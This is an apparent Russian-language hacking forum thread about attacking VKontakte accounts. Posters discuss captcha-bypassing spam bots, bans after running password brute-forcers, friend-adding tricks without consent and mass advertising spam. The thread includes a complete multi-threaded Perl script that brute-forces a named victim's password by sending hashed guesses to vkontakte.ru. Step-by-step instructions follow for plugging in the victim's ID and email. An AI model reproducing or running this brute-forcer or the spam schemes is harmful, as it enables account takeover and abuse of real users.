Вот вот... ИМХО глупо... Кстати, а кто нить знает спамер для контакта? Мне интересно как там обходят ввод кода, потому что если один и тот же текст слать нескольким людям, то просит код подтверждения
ну это я и сам допер... ******************************************** Нашел способ как получить чистый, полезный текст БЕЗ ЛИШНИХ СИМВОЛОВ
Ну вобще ][eViOr перечислил... хотя я даже не знаю... был человек у которого 30 друзей, даи по виду на хацкеров не похожи, да и то что стоит видно мыло, ася, телефоны домашние и сотовые явно не наделяет особым умом... мож реально детки каких нить богатеньких папочек
Мне интересно, есть люди которые получили бан вконтакте и сайт вобще не грузится, как будто в отключки, или нет соединение с инетом. Просто у меня такая байда уже три месяца, случилось после того как я запустил два брутера по 100 потоков каждый. Приходится сидеть через прокси и впн Добавлено: За плюс спасибо. ТО что это бан я знал, а вот можно ли его снять? (написать с поддержку контакта и.т.п). Просто брутером пользуются многие, а криков типа "меня забанили" не наблюдается, вот я и подумал что может я один такой невезучий.
Нашёл одну непонятную хрень... вылезает окошко, с надписью, какую только пожелаешь) тока % = %25 ? = %3f, остальное без изменений короче, в начале любой надписи на стене ставится восклицательный знак, а дальше чё угодно. вопрос: так задумано или нет?
Добаялем всебе в закладки дурова: заменяем MID и добавляем кого угодно. ЗЫ http://vkontakte.ru/test.php
дак вроде сам проверял, радужные таблицы выдавали обратно пароль..никаких дат рождения или адресов мыл. уточни плиз, где что когда
а дело не в том что мы кого-то добавляем, а подставляем свой id, id своей группы и даём ссылочку кому-нить)
неплохо вот щас мысль появилась, вы все наверно видели феньку "предложения" ну так вот там есть рандомный поиск предложений, думаю смысл уже уловили-регим акки, ставим авики с рекламой, страницу заполняем рекламой и массово отвечаем скриптом на предложения
Code: #!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads ###################################### $dic = 'passl.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ###################################### open (pass, "<$dic»); Next: @pass = pass(); for(0…$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>'vkontakte.ru', PeerPort=>80); print $sock «HEAD http://vkontakte.ru/ HTTP/1.0\r\n». «Host: vkontakte.ru\r\n». «Accept: */*\r\n». «Content-Type: application/x-www-form-urlencoded\r\n». «User-Agent: Mozillo\r\n». «Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n». «Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while (<pass>){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; } Как запустить: 1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию. 2. Потом копируем текст в текстовый файл из кода выше... меняешь id и мыло жертвы на нужное ,сохраняем как brut.txt 3. Переименовываем файл из brute.txt в brute.pl 4. Туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt 5. Запускай файл, и радуйся… 6. Создастся good.txt, где и будет твой пасс. © grabberz.com
народ как добавить одновременно всех друзей на фото. Всё утро пытался нехера не получилось, через оперу, остала пробывал успехов небыло.
Слышал о фишке добавления в друзья без согласия пользователя которого ты добавляешь,мб кто знает как сделать ? ))